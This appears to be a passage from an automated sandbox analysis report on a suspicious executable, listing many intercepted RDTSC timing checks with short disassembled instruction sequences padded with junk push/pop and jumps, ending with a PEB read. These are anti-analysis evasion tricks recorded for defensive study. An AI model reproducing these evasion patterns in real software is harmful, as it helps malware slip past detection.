Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E41E2 second address: 14E41F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E44F1 second address: 14E44FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB0A4FB5B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E44FB second address: 14E4509 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E4509 second address: 14E450F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E450F second address: 14E4513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E4513 second address: 14E4531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Fh 0x00000007 jbe 00007FB0A4FB5B86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14E4531 second address: 14E4539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14EA125 second address: 14EA132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB0A4FB5B86h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14EA132 second address: 14EA138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14ED573 second address: 14ED594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B8Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FB0A4FB5B8Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14ED9A3 second address: 14ED9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB0A5355D56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14EDE1F second address: 14EDE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F9672 second address: 14F9689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0A5355D5Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F9689 second address: 14F96A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B93h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F96A2 second address: 14F96B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0A5355D5Eh 0x00000008 jg 00007FB0A5355D56h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F96B6 second address: 14F96BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F7900 second address: 14F7906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F7906 second address: 14F790C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F7CCF second address: 14F7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F7F65 second address: 14F7F96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB0A4FB5B8Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB0A4FB5B92h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F7F96 second address: 14F7FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB0A5355D56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F850A second address: 14F8532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0A4FB5B8Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB0A4FB5B93h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F8532 second address: 14F853A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F853A second address: 14F854D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F854D second address: 14F8579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FB0A5355D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FB0A5355D6Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14F8E29 second address: 14F8E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1503BB2 second address: 1503BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 150F335 second address: 150F339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 150F339 second address: 150F371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB0A5355D82h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 150F371 second address: 150F377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 150F377 second address: 150F38C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151397D second address: 15139A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A4FB5B90h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB0A4FB5B90h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15173F6 second address: 151740B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151740B second address: 151740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151740F second address: 1517413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1516F7C second address: 1516F8C instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0A4FB5B92h 0x00000008 jno 00007FB0A4FB5B86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1516F8C second address: 1516F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB0A5355D5Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8A4 second address: 151D8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8A8 second address: 151D8B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8B3 second address: 151D8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8B9 second address: 151D8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8C1 second address: 151D8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8CD second address: 151D8EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0A5355D56h 0x00000008 jmp 00007FB0A5355D67h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D8EE second address: 151D909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B95h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 151D909 second address: 151D90F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1527BC9 second address: 1527BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1527BCD second address: 1527BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 152935D second address: 1529385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A4FB5B99h 0x00000008 jmp 00007FB0A4FB5B8Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1529385 second address: 1529399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB0A5355D5Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1529399 second address: 152939D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1531E20 second address: 1531E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1531E26 second address: 1531E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15322C6 second address: 15322CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15326FE second address: 1532708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1532708 second address: 1532710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15364F9 second address: 153650D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB0A4FB5B86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 153650D second address: 153653A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0A5355D63h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB0A5355D5Bh 0x00000013 jng 00007FB0A5355D56h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 153653A second address: 153653E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15834A6 second address: 15834F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A5355D5Ah 0x00000008 jmp 00007FB0A5355D65h 0x0000000d popad 0x0000000e jmp 00007FB0A5355D5Fh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push ebx 0x00000017 jmp 00007FB0A5355D64h 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 15834F5 second address: 15834F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 158334D second address: 1583353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1583353 second address: 1583357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1586B15 second address: 1586B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FB0A5355D73h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jnl 00007FB0A5355D56h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1586B50 second address: 1586B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB0A4FB5B86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1586B5C second address: 1586B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1586B60 second address: 1586B6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1586B6A second address: 1586B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB0A5355D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1654384 second address: 165438A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165438A second address: 1654393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1654393 second address: 1654399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1654399 second address: 16543FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0A5355D65h 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FB0A5355D66h 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d pushad 0x0000001e jne 00007FB0A5355D56h 0x00000024 jne 00007FB0A5355D56h 0x0000002a jmp 00007FB0A5355D5Dh 0x0000002f jnp 00007FB0A5355D56h 0x00000035 popad 0x00000036 pushad 0x00000037 push eax 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 16543FD second address: 1654403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 16536DD second address: 16536FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D63h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653B06 second address: 1653B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653B0A second address: 1653B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653DB7 second address: 1653DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653DBC second address: 1653DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653DC4 second address: 1653DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653F4B second address: 1653F55 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0A5355D62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1653F55 second address: 1653F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB0A4FB5B86h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165841D second address: 1658421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 16589FC second address: 1658A71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007FB0A4FB5B96h 0x00000010 jmp 00007FB0A4FB5B90h 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 popad 0x0000001a nop 0x0000001b push eax 0x0000001c mov dword ptr [ebp+12B57563h], esi 0x00000022 pop edx 0x00000023 push dword ptr [ebp+129C21BEh] 0x00000029 push edi 0x0000002a cld 0x0000002b pop edx 0x0000002c push edi 0x0000002d sub dword ptr [ebp+12B2F2E3h], edi 0x00000033 pop edx 0x00000034 call 00007FB0A4FB5B89h 0x00000039 jmp 00007FB0A4FB5B90h 0x0000003e push eax 0x0000003f jl 00007FB0A4FB5B92h 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1658A71 second address: 1658A7B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1658A7B second address: 1658A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1658A81 second address: 1658A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165BC7E second address: 165BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165BC85 second address: 165BC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB0A5355D56h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA27 second address: 165DA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA2B second address: 165DA30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA30 second address: 165DA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410033 second address: 7410038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410038 second address: 74100BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB0A4FB5B96h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov esi, 05D70C1Dh 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B8Ah 0x0000001d jmp 00007FB0A4FB5B95h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr fs:[00000030h] 0x0000002a jmp 00007FB0A4FB5B8Eh 0x0000002f sub esp, 18h 0x00000032 jmp 00007FB0A4FB5B90h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov di, 1120h 0x0000003f mov ecx, edx 0x00000041 popad 0x00000042 rdtsc
